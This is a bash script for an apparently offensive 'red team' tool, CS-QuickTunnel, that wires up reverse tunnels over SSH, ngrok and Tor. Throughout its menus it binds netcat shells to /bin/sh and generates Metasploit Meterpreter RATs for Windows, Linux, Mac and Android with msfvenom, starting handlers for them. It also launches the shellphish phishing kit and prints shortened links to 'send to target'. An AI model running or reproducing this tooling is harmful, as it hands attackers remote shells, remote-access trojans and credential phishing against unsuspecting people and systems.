CS-QuickTunnel.sh

#!/bin/bash
# CS-QuickTunnel v0.6
# Coded by: Cyber Secrets - Information Warfare Center
# Tool for Red Team ops
# Github: https://github.com/infosecwriter/CS-QuickTunnel
# This script uses some Phishing Pages generated by shellphish Github https://github.com/thelinuxchoice/shellphish
# This script creates a reverse tunnel including SSH, Ngrok, and Tor that maps back to you locally
# Current shells supported are RAW, NetCat, and Metasploit/Meterpreter
# Current GUI shells supported are VNC  and NoMachine

trap 'printf "\n";stop;exit 1' 2
clear

startmenu() {
	banner
	default_port="12345"
	default_server="serveo.net"
	printf "\e[92m  SSH Reverse Tunneling                                      =  1\n"
	printf "  NGROK Reverse Tunneling                                    =  2\n"
	if command -v tor > /dev/null 2>&1; then
		printf "  TOR Reverse Tunneling & Hidden Service                     =  3\n"
	fi
	printf "  SOCAT Reverse Tunneling Proxy                              =  8\n"
	printf "  Check Dependencies                                         =  9\n"
	printf "  Run Shellphish @thelinuxchoice                             = 10\n"
	printf "  Exit                                                       = 99\n"
	printf "\n"
	read -p $'  Choose an option: \e[37;1m' option
	case $option in
		99)      
			stop 1
			;;
		1|01)      
			menussh
			;;
		2|02)
			ngrokme
			menungrok		
			;; 
		3|03)
			menutor
			;;
		8|08)
			menusocat
			;;
		9|09)
			printf "\e[93mChecking dependencies"
			apt update | tee -a dep.log
			command -v unzip > /dev/null 2>&1 || { apt install unzip | tee -a dep.log; }
			command -v wget > /dev/null 2>&1 || { apt install wget | tee -a dep.log; }
			command -v curl > /dev/null 2>&1 || { apt install curl | tee -a dep.log; }
			command -v tor > /dev/null 2>&1 || { apt install tor | tee -a dep.log; }
			command -v netcat > /dev/null 2>&1 || { apt install netcat | tee -a dep.log; }
			command -v cryptcat > /dev/null 2>&1 || { apt install cryptcat | tee -a dep.log; }
			command -v php > /dev/null 2>&1 || { apt install php | tee -a dep.log; }
			command -v apparmor-utils > /dev/null 2>&1 || { apt install apparmor-utils | tee -a dep.log; }
			command -v vncserver > /dev/null 2>&1 || { apt install tightvncserver | tee -a dep.log; }
			if [[ -e ngrok ]]; then
				ngrokme
			fi
			printf "\e[93mChecking done.  Review the above logs for potential issues.\n If dependencies are not configured properly, tunnels will NOT work\n\nPress enter when done"
			read depme
			startmenu
			;; 
		10)
			rm -rf shellphish
			git clone https://github.com/thelinuxchoice/shellphish
			cd shellphish
			clear
			bash shellphish.sh
			startmenu
			;;
  		*)
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		clear
		startmenu
		;;
	esac
}

menussh() {
	banner
	default_port="12345"
	default_server="serveo.net"
	printf "\e[92m  Reverse tunnel                                             =  1\n"
	printf "  Run a NetCat listener reverse tunnel                       =  2\n"
	printf "  Run a NetCat listener reverse connect - reverse tunnel     =  3\n"
	printf "  Run a NoMachine listener reverse tunnel                    =  4\n"
	printf "  Run a VNC listener reverse tunnel                          =  5\n"
	printf "  Run PHP Server Through a Serveo.net reverse tunnel         = 10\n"	
	printf "\n  Meterpreter reverse tunnels\n"
	if command -v msfconsole > /dev/null 2>&1; then
		printf "  [*] Run a Metasploit Meterpreter (Windows) listener        = 21\n"
		printf "  [*] Run a Metasploit Meterpreter (Linux) listener          = 22\n"
		printf "  [*] Run a Metasploit Meterpreter (Mac) listener            = 23\n"
		printf "  [*] Run a Metasploit Meterpreter (Android) listener        = 24\n"
	fi
	printf "  Exit                                                       = 99\n"
	printf "\n"

	read -p $'  Choose an option: \e[37;1m' option
	if [[ $option == 99 ]]; then 
		startmenu
	fi
	printf '\e[92mChoose a local listening port (Example:12345)\e[37;1m: ' $default_port
	read lport; lport="${lport:-${default_port}}"
	printf '\e[92mChoose a remote SSH server to reverse tunnel from (Example: serveo.net)\e[37;1m: ' $default_server
	read rserver; rserver="${rserver:-${default_server}}"
	printf '\e[92mChoose a remote port on the SSH server (Example:12345)\e[37;1m: ' $default_port
	read rport; rport="${rport:-${default_port}}"
	case $option in
		1|01)      
			printf "\e[1;93m [!] Reverse tunnel from $remote to localhost port $lport\e[0m\n"
			serveoitforward
			;;
		2|02)      
			nc -l -p $lport -e /bin/sh > /dev/null 2>&1 &
			menussh
			;;
		3|03)      
			printf "\e[1;93m [!] Starting NetCat Server on port "$lport"!\e[0m\n"
			nc -lvp -p $lport -e /bin/sh > /dev/null 2>&1 &
			serveoitforward
			;;
		4|04)      
			lport="4000"
			printf "\e[1;93m [!] Starting Nomachine on port"$lport"!\e[0m\n"
			nomachineme
			serveoitforward
			;;
		5|05)      
			printf "\e[1;93m [!] Starting Nomachine on port"$lport"!\e[0m\n"
			vncserver -rfbport $lport
			serveoitforward
			;;
		10)      
			serveserveo
			;;
	# Metasploit
		21)      
			payload="windows/meterpreter/reverse_tcp"
			platform="-a x86 --platform windows"
			filetype="-f exe"
			fileext="exe"
			OSType="Windows"
			MetasploitMe
			serveoitforward
			;;
		22)      
			payload="linux/x86/meterpreter/reverse_tcp"
			platform=""
			filetype="-f elf"
			fileext="elf"
			OSType="Linux"
			MetasploitMe
			serveoitforward
			;;
		23)      
			payload="osx/x86/shell_reverse_tcp"
			platform=""
			filetype="-f macho"
			fileext="macho"
			OSType="Mac"
			MetasploitMe
			serveoitforward
			;;
		24)      
			payload="android/meterpreter/reverse_tcp"
			platform=""
			filetype="R"
			fileext="apk"
			OSType="Android"
			MetasploitMe
			serveoitforward
			;;
		*)
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		sleep
		clear
		menussh
		;;
	esac

}

menungrok() {
	banner
	default_port="12345"
	printf "\e[92m  Reverse Tunneling through Ngrok.io                         =  1\n"
	printf "  Run a NetCat listener  reverse tunnels                     =  2\n"
	printf "  Run a NetCat listener reverse conect -  reverse tunnels    =  3\n"
	printf "  Run a NoMachine listener reverse tunnel                    =  4\n"
	printf "  Run a VNC listener reverse tunnel                          =  5\n"
	printf "  Run PHP Server Through Ngrok.io  reverse tunnels           = 10\n"
	printf "\n  Meterpreter reverse tunnels\n"
	if command -v msfconsole > /dev/null 2>&1; then
		printf "  [*] Run a Metasploit Meterpreter (Windows) listener        = 21\n"
		printf "  [*] Run a Metasploit Meterpreter (Linux) listener          = 22\n"
		printf "  [*] Run a Metasploit Meterpreter (Mac) listener            = 23\n"
		printf "  [*] Run a Metasploit Meterpreter (Android) listener        = 24\n"
	fi
	printf "  Exit                                                       = 99\n"
	printf "\n"
	read -p $'  Choose an option: \e[37;1m' option
	if [[ $option == 99 ]]; then 
		startmenu
	fi
	printf 'Choose a local listening port (Example:12345): ' $default_server
	read lport
	lport="${lport:-${default_port}}"
	case $option in
		1|01)      
			printf "\e[1;93m [!] Reverse tunnel from $remote to localhost port $lport\e[0m\n"
			ngrokitforward
			;;
		2|02)      
			printf "\e[1;93m [!] Starting NetCat Server on port "$lport"!\e[0m\n"
			nc -l -p $lport -e /bin/sh > /dev/null 2>&1 &
			ngrokitforward
			;;
		3|03)      
			printf "\e[1;93m [!] Starting NetCat Server on port "$lport"!\e[0m\n"
			nc -lvp $lport -e /bin/sh > /dev/null 2>&1 &
			ngrokitforward
			;;
		4|04)      
			lport="4000"
			printf "\e[1;93m [!] Starting Nomachine on port"$lport"!\e[0m\n"
			nomachineme
			ngrokitforward
			;;
		5|05)      
			printf "\e[1;93m [!] Starting VNC on port"$lport"!\e[0m\n"
			vncserver -rfbport $lport
			ngrokitforward
			;;
		10)      
			printf "\e[1;93m [!] Starting PHP Server on port: "$lport"!\e[0m\n"
			servengrok
			;;
	# Metasploit
		21)      
			payload="windows/meterpreter/reverse_tcp"
			platform="-a x86 --platform windows"
			filetype="-f exe"
			fileext="exe"
			OSType="Windows"
			MetasploitMe
			ngrokitforward
			;;
		22)      
			payload="linux/x86/meterpreter/reverse_tcp"
			platform=""
			filetype="-f elf"
			fileext="elf"
			OSType="Linux"
			MetasploitMe
			ngrokitforward
			;;
		23)      
			payload="osx/x86/shell_reverse_tcp"
			platform=""
			filetype="-f macho"
			fileext="macho"
			OSType="Mac"
			MetasploitMe
			ngrokitforward
			;;
		24)      
			payload="android/meterpreter/reverse_tcp"
			platform=""
			filetype="R"
			fileext="apk"
			OSType="Android"
			MetasploitMe
			ngrokitforward
			;;
		*)
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		sleep
		clear
		menungrok
		;;
	esac

}

menutor() {
	banner
	default_port="12345"
	default_server="serveo.net"
	printf "\e[92m  Tor Hidden Service - Reverse Tunnel                        =  1\n"
	printf "  Run a NetCat listener  reverse tunnels                     =  2\n"
	printf "  Run a NetCat listener reverse conect -  reverse tunnels    =  3\n"
	printf "  Run a NoMachine listener reverse tunnel                    =  4\n"
	printf "  Run a VNC listener reverse tunnel                          =  5\n"
	printf "  Tor Hidden Service - PHP Web Server                        = 10\n"
	printf "  Show Tor Hidden Service .onion Address                     = 11\n"
	printf "  Add User & Install Tor Browser                             = 12\n"
	printf "  Reset .onion Address                                       = 13\n"
	printf "  Remove User & Tor Browser                                  = 14\n"
	printf "  Exit                                                       = 99\n"
	printf "\n"
	read -p $'  Choose an option: \e[37;1m' option
	printf "\n"
	if [[ $option == 99 ]]; then 
		startmenu
	fi
	case $option in
		1|01)      
			printf '\e[92mChoose a listening port (Example:12345): \e[37;1m' $default_port
			read lport
			toritforward
			;;

		4|04)      
			lport="4000"
			printf "\e[1;93m [!] Starting Nomachine on port"$lport"!\e[0m\n"
			nomachineme
			toritforward
			;;
		5|05)      
			printf '\e[92mChoose a listening port (Example:12345): \e[37;1m' $default_port
			read lport
			printf "\e[1;93m [!] Starting VNC on port"$lport"!\e[0m\n"
			vncserver -rfbport $lport
			toritforward
			;;
		10)      
			printf "\e[1;93m [!] Starting PHP Server on port \e[37;1m"$lport"!\n"
			servetor
			;;
		11)      
			systemctl restart tor
			if [[ -e /var/lib/tor/myservices/hostname ]]; then
				hostname=$(cat /var/lib/tor/myservices/hostname)
				printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m]Tor hidden service hostname is: \e[37;1m$hostname\n\n\n"
			else
				printf "\e[91mNo .onion address found\n\n\n"
			fi
			printf "\e[92mPress ENTER to continue"; read me
			menutor
			;;
		12)      
			systemctl restart tor
			torview
			;;
		13)      
			printf "\e[93mAre you sure?  This can't be reversed without a backup. UPPER CASE 'Y' to delete: "; read me
			printf $me
			if [[ $me == "Y" ]]; then
				hostname=""
				rm -rf /var/lib/tor/myservices
				systemctl restart tor; sleep 5
			else
				printf "\e[91mNo change to .onion address"; sleep 3	
			fi
			hostname=$(cat /var/lib/tor/myservices/hostname)
			printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m]Tor hidden service hostname is: \e[37;1m$hostname\n\n\n"; sleep 5
			menutor
			;;
		14)      
			systemctl stop tor
			tordeview
			systemctl start tor	
			;;
		*)
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		sleep 1
		clear
		menutor
		;;
	esac
}


menusocat() {
	banner
	default_port="12345"
	default_server="serveo.net"
	printf "\e[92m  SSH Reverse Tunnel Proxy                                   =  1\n"
	printf "  NGROK Reverse Tunnel Proxy                                 =  2\n"
	printf "  Tor Reverse Tunnel Proxy                                   =  3\n"
	printf "  Exit                                                       = 99\n"
	printf "\n"
	read -p $'  Choose an option: \e[37;1m' option
	printf "\n"
	if [[ $option == 99 ]]; then 
		startmenu
	fi
	rserver="serveo.net"
	default_rrserver="towel.blinkenlights.nl"
	default_rrport="23"
	printf '\e[92mChoose a local listening port (Example:12345)\e[37;1m: ' $default_port
	read lport; lport="${lport:-${default_port}}"
	printf '\e[92mChoose a remote server to forward/pivot to (Example:Server Name)\e[37;1m: ' $default_rrserver
	read rrserver; rrserver="${rrserver:-${default_rrserver}}"
	printf '\e[92mChoose a remote port to forward/pivot to (Example:12345)\e[37;1m: ' $default_rrport
	read rrport; rrport="${rrport:-${default_rrport}}"
	socatitforward
	case $option in
		1|01)      
			printf '\e[92mChoose a reverse tunnel port to pivot from (Example:12345)\e[37;1m: ' $default_port
			read rport; rport="${rport:-${default_port}}"
			printf "\n"
			serveoitforward
			menussh
			menusocat
			;;
		2|02)  
			ngrokitforward 
			menusocat
			;;
		3|03)      
			toritforward
			read me
			menusocat
			;;
		*)
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		sleep 1
		clear
		menutor
		;;
	esac
}


MetasploitMe() {
	read -p $'\e[92mChoose RAT name with ".'$fileext'" extention: ' pname
	printf "\e[1;93m [!] Starting Metasploit Meterpreter ($OSType) listener on port "$lport"!\e[0m\n"
	rm -rf reverse-connect.sh
	echo 'msfconsole -x "use exploit/multi/handler; set payload '$payload'; set LPORT '$lport'; set LHOST 127.0.0.1; run;"' > reverse-connect.sh
	printf "\e[1;93m [!] To create a meterpreter RAT, RUN \n msfvenom $platform -p $payload LHOST=$rserver LPORT=$rport $file > $pname\n"
	printf " \e[92mCopy "$pname" to the remote $OSType system \n Then run "$pname"!\n"
	mkdir site/installs > /dev/null 2>&1
	service postgresql stop > /dev/null 2>&1
	service postgresql start > /dev/null 2>&1
	printf "\e[92mCreating RAT locally, located in the ./site/installs/ folder\n"
	msfvenom $platform -p $payload LHOST=$rserver LPORT=$rport $filetype > site/installs/$pname
	chmod +x site/installs/$pname
	chmod +x reverse-connect.sh
	printf "Starting Metasploit with $payload listener..."
	xterm ./reverse-connect.sh &

}

nomachineme() {
	if [[ -e nomachine_*_amd64.deb ]]; then
		printf ""
	else
		wget https://download.nomachine.com/download/6.3/Linux/nomachine_6.3.6_1_amd64.deb
		sudo dpkg -i nomachine_*_amd64.deb
	fi
}

ngrokme() {
	if [[ -e ngrok ]]; then
		printf "Installed...\n"
	else
		printf "\e[1;92m[\e[0m*\e[1;92m] Downloading Ngrok...\n"
		wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 
		if [[ -e ngrok-stable-linux-386.zip ]]; then
			unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
			chmod +x ngrok
			rm -rf ngrok-stable-linux-386.zip
		else
			printf "\e[91m[!] Download error... \n"
			exit 1
		fi
	fi
}

torview() {
	# Installing Tor browser
	printf "\e[93m  Testing the address through a the Tor Browser Bundle...  \n   Please be patient...\n   This may take a few minutes...\n"
	toruser=`cat /etc/passwd | grep -i "kalitor:" | cut -d ":" -f 1`
	if [[ $toruser == "kalitor" ]]; then
		printf "   User found\n"
	else
		useradd -m kalitor -G sudo -s /bin/bash && echo -e "kalitor\nkalitor\n" | passwd kalitor
		xhost si:localuser:kalitor
	fi
	if [[ -e /home/kalitor/tor-browser_en-US/start-tor-browser.desktop ]]; then
		# Stalling while route is built to Tor2Web
		printf "\n"
	else
		printf "\e[93m Downloading the Tor Browser for ease of use"
		rm tor-browser-linux64-8.0.3*
		wget https://www.torproject.org/dist/torbrowser/8.0.3/tor-browser-linux64-8.0.3_en-US.tar.xz
		chown kalitor tor-browser-linux64-8.0.3_en-US.tar.xz
		curdir=$(pwd)
		sudo -u kalitor -H tar -xvJf tor-browser-linux64-8.0.3_en-US.tar.xz -C /home/kalitor/
	fi
	timex
	checkphp=$(ps aux | grep -o "php" | head -n1)
	if [[ -e /var/lib/tor/myservices/hostname && $checkphp == *'php'* && ! -z "$lport" ]]; then
		hostname=$(cat /var/lib/tor/myservices/hostname)
		torhostname=$hostname:$lport
		printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m]Tor hidden service hostname is: \e[37;1m$hostname\n\n\n"
		cd /home/kalitor/tor-browser_en-US/
		sudo -u kalitor -H ./start-tor-browser.desktop $torhostname
		cd $curdir
	else
		printf "\e[91mLaunching Tor Browser...\n"
		cd /home/kalitor/tor-browser_en-US/
		sudo -u kalitor -H ./start-tor-browser.desktop cybersec.tv https://duckduckgo.com/?ia=web
		cd $curdir
	fi
	printf "\e[92mPress enter to return to main menu or CTRL+C to end session\n"
	read me
	menutor
}

timex() {
	tortimex=0
	printf "Resolving Tor Network... "
	while [ $tortimex != 30 ]
	do
		sleep 1
		printf "|"
		let tortimex++
	done
	printf "\n"
}

tordeview() {
	# Kill user & Un-Installing Tor browser
	killall -u kalitor
	deluser kalitor	
	rm -rf /home/kalitor
	# bleachbit -c --preset
	menutor
}

toritforward() {
	# Reverse tunneling with Tor.  You run the server locally.  We just add the config
	killall tor > /dev/null 2>&1 
	aa-complain system_tor
	lport="${lport:-${default_port}}"
	printf "\e[1;93m [!] Starting Tor Hidden Server on port "$lport"!\e[0m\n"
	if (grep -Fxq "HiddenServiceDir /var/lib/tor/myservices/" /etc/tor/torrc); then
	    sleep 1
	else
	    echo "HiddenServiceDir /var/lib/tor/myservices/" >> /etc/tor/torrc
	fi
	if (grep -Fxq "HiddenServicePort $lport 127.0.0.1:$lport" /etc/tor/torrc); then
	    sleep 1
	else
	    echo "HiddenServicePort $lport 127.0.0.1:$lport" >> /etc/tor/torrc
	fi
	sed -i 's/#SocksPolicy\ reject\ \*/SocksPolicy\ accept\ \*/g' /etc/tor/torrc
	killall tor		
	systemctl start tor 
	journalctl -b --no-pager | grep -i tor | tail -n40 | grep -i warn
	sleep 5
	printf "\n\e[92mSetting up Tor hidden service... \n"
	eip="curl ipinfo.io/ip"
	printf "\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m]Your external Internet IP address is: \e[37;1m"
	$eip
	tip="torsocks curl ipinfo.io/ip"
	printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m]Your Torified external IP address is: \e[37;1m"
	$tip
	if [[ $eip == $tip ]]; then
		printf "\e[31;1mTOR FAILED.  IPs are the SAME!!!"
		printf "\e[31;1mMake sure your ISP or network isn't blocking Tor.  Press Enter for menu\e[92m"
		read me
	fi	
	hostname=$(cat /var/lib/tor/myservices/hostname)
	printf "Here is the path to fortune: \e[37;1m$hostname:$lport\n"
	timex
	printf "\e[1;92m[\e[0m*\e[1;92m] Opening with NetCat to test port \e[0m\e[1;77m %s\e[0m\n"
	echo 'torsocks nc '$hostname $lport > reverse-tor-connect.sh
	chmod +x reverse-tor-connect.sh
	xterm ./reverse-tor-connect.sh &
	printf "\e[92mPress enter to return to main menu or CTRL+C to end session\n"
	read me
	menutor
}

ngrokitforward() {
	printf "\e[92mStarting NGROK tunnel...\e[0m\n"
	./ngrok tcp $lport > /dev/null 2>&1 &
	sleep 5
	rport=$(curl -s -N http://127.0.0.1:4040/status | grep -o "tcp.ngrok.io:[0-9].\{4\}" | cut -d ":" -f 2) 
	rserver="tcp.ngrok.io"
	printf "\e[1;92m[\e[0m*\e[1;92m] Your new server:\e[0m\e[1;77m %s\e[0m\n" $rserver:$rport
	printf "\e[1;92m[\e[0m*\e[1;92m] Opening with NetCat to test port \e[0m\e[1;77m %s\e[0m\n"
	echo 'nc '$rserver $rport > reverse-ngrok-connect.sh
	chmod +x reverse-ngrok-connect.sh
	xterm ./reverse-ngrok-connect.sh &	
	printf "\e[92mPress enter to return to main menu or CTRL+C to end session\n"
	read me
	menungrok
}

socatitforward() {
	socat tcp-listen:$lport,reuseaddr,fork TCP:$rrserver:$rrport &
	printf "\e[92mPress enter to return to main menu or CTRL+C to end session\n"
	read me
	menusocat
}

serveoitforward() {
	if [[ $OSType == "Linux" ]]; then
11		read -p $"\nWould you like to test the Linux RAT? (Y)" testme 
		if [[ $testme == "y" || $testme == "Y" ]]; then
			echo "./site/installs/$pname" > testme.sh
			bash testme.sh &
		fi
	fi
	printf "\e[92mStarting tunnel...\e[0m\n"
	printf "\e[1;92m[\e[0m*\e[1;92m] Opening with NetCat to test port \e[0m\e[1;77m %s\e[0m\n"
	echo 'sleep 5; nc '$rserver $rport > reverse-ngrok-connect.sh
	chmod +x reverse-ngrok-connect.sh
	xterm ./reverse-ngrok-connect.sh &
	ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R $rport:localhost:$lport $rserver
	printf "\e[92mPress enter to return to main menu or CTRL+C to end session\n"
	read me
	menussh
}

serveserveo() {
	# SHELLPHISH, AUTHOR: @thelinuxchoice
	printf "\e[1;92m[\e[0m*\e[1;92m] Starting php server...\n"
	cd site && php -S 127.0.0.1:$lport > /dev/null 2>&1 & 
	sleep 2
	printf "\e[92mStarting server...\e[0m\n"
	command -v ssh > /dev/null 2>&1 || { echo >&2 "I require SSH but it's not installed. Install it. Aborting."; exit 1; }
	if [[ -e sendlink ]]; then
		rm -rf sendlink
	fi
	$(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:'$lport' serveo.net 2> /dev/null > sendlink ' &
	printf "\n"
	sleep 10
	send_link=$(grep -o "https://[0-9a-z]*\.serveo.net" sendlink)
	printf "\n"
	printf '\n\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m] Send the direct link to target:\e[0m\e[1;77m %s \n' $send_link
	send_ip=$(curl -s http://tinyurl.com/api-create.php?url=$send_link | head -n1)
	printf '\n\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m] Or using tinyurl:\e[0m\e[1;77m %s \n' $send_ip
	printf "\n"
	firefox $send_link $send_link/installs.php
	menussh
}

servengrok() {
	ngrokme
	printf "\e[92mStarting PHP server...\n"
	cd site && php -S 127.0.0.1:$lport > /dev/null 2>&1 & 
	sleep 2
	printf "\e[92mStarting ngrok server...\n"
	./ngrok http $lport > /dev/null 2>&1 & sleep 10 && link=$(curl -s -N http://127.0.0.1:4040/status | grep -o "https://[0-9a-z]*\.ngrok.io")
	printf "\e[92mYour new server: \e[37;1m$link\n" 
	printf "\e[92mOpening with Firefox in 3 seconds\n"
	sleep 3 
	firefox $link $link/installs.php
	printf "\e[92mPress enter to return to main menu or CTRL+C to end session\n"
	read waitforngrok
	menungrok
}

servetor() {
	aa-complain system_tor
	systemctl restart apparmor
	systemctl restart tor
	printf '\e[92mChoose a listening port (Example:12345): \e[37;1m' $default_port
	read lport
	lport="${lport:-${default_port}}"
	printf "\n\e[1;92m[\e[0m*\e[1;92m] Starting php server...\n"
	cd site && php -S 127.0.0.1:$lport > /dev/null 2>&1 & 
	sleep 2
	printf "\e[1;93m [!] Starting Tor Hidden Server on port "$lport"!\e[0m\n"
	if (grep -Fxq "HTTPTunnelPort 0.0.0.0:9080" /etc/tor/torrc); then
	    sleep 1
	else
	    echo "HTTPTunnelPort 0.0.0.0:9080" >> /etc/tor/torrc
	fi
	if (grep -Fxq "HiddenServiceDir /var/lib/tor/myservices/" /etc/tor/torrc); then
	    sleep 1
	else
	    echo "HiddenServiceDir /var/lib/tor/myservices/" >> /etc/tor/torrc
	fi
	if (grep -Fxq "HiddenServicePort $lport 127.0.0.1:$lport" /etc/tor/torrc); then
	    sleep 1
	else
	    echo "HiddenServicePort $lport 127.0.0.1:$lport" >> /etc/tor/torrc
	fi
	sed -i 's/#SocksPolicy\ reject\ \*/SocksPolicy\ accept\ \*/g' /etc/tor/torrc
	killall tor		
	systemctl restart tor 
	sleep 10
	journalctl -b --no-pager | grep -i tor | tail -n40 | grep -i warn
	printf "\n\e[92mSetting up Tor hidden service... \n"
	eip="curl ipinfo.io/ip"
	printf "\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m]Your external Internet IP address is: \e[37;1m"
	$eip
	tip="torsocks curl ipinfo.io/ip"
	printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m]Your Torified external IP address is: \e[37;1m"
	$tip
	if [[ $eip == $tip ]]; then
		printf "\e[91mTOR FAILED.  IPs are the SAME!!!"
		printf "\e[91mMake sure your ISP or network isn't blocking Tor.  Press Enter for menu\e[92m"
		read me
	fi	
	hostname=$(cat /var/lib/tor/myservices/hostname)
	torview
	printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m]Tor hidden service hostname is: $hostname\n\n"
	printf "   You can connect to your new PHP Webserver using: \n    \e[37;1m> http://$hostname:$lport throught Tor\n\n\e[92m"
	printf "   You can connect to your new PHP Webserver using: \n    \e[37;1m> http://$hostname.to:$lport throught the Internet\n\n\e[92m"
	printf "If the page doesn't load, wait a minute and try again...\n\nPress enter to return to main menu or CTRL+C to end session"
	
	read waitfortor
	menutor
}

stop() {
	printf "\nCleaning up services\n"
	checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
	checkphp=$(ps aux | grep -o "php" | head -n1)
	checkssh=$(ps aux | grep -o "ssh" | head -n1)
	checktor=$(ps aux | grep -o "tor" | head -n1)
	if [[ $checkngrok == *'ngrok'* ]]; then
		pkill -f -2 ngrok > /dev/null 2>&1
		killall -2 ngrok > /dev/null 2>&1
	fi
	if [[ $checkphp == *'php'* ]]; then
		pkill -f -2 php > /dev/null 2>&1
		killall -2 php > /dev/null 2>&1
	fi
	if [[ $checkssh == *'ssh'* ]]; then
		pkill -f -2 ssh > /dev/null 2>&1
		killall ssh > /dev/null 2>&1
	fi
	if [[ $checktor == *'tor'* ]]; then
		pkill -f -2 tor > /dev/null 2>&1
		killall tor > /dev/null 2>&1
	fi
	killall socat > /dev/null 2>&1
	killall xterm > /dev/null 2>&1
	killall Xtightvnc > /dev/null 2>&1
	killall -u kalitor
	rm -rf reverse-connect.sh > /dev/null 2>&1
	rm -rf reverse-ngrok-connect.sh > /dev/null 2>&1
	exit 1
}
	
banner() {
	clear
	printf "\n"
	printf "\e[1;93m    .:.:.\e[0m\e[1;77m Quick Tunneling tool coded by: @InfoSecWriter   \e[0m\e[1;93m.:.:.\e[0m\n"
	printf "\e[1;93m    .:.:.\e[0m\e[1;77m https://github.com/infosecwriter/CS-QuickTunnel \e[0m\e[1;93m.:.:.\e[0m\n"
	printf "\e[1;93m    .:.:.\e[0m\e[1;77m CyberSecrets.org : IntelligentHacking.com       \e[0m\e[1;93m.:.:.\e[0m\n"
	printf "\n"
	printf "  \e[101m\e[1;77m:: Disclaimer: Developers assume no liability and are not    ::\e[0m\n"
	printf "  \e[101m\e[1;77m:: responsible for any misuse or damage caused...            ::\e[0m\n"
	printf "\n"
}

banner
startmenu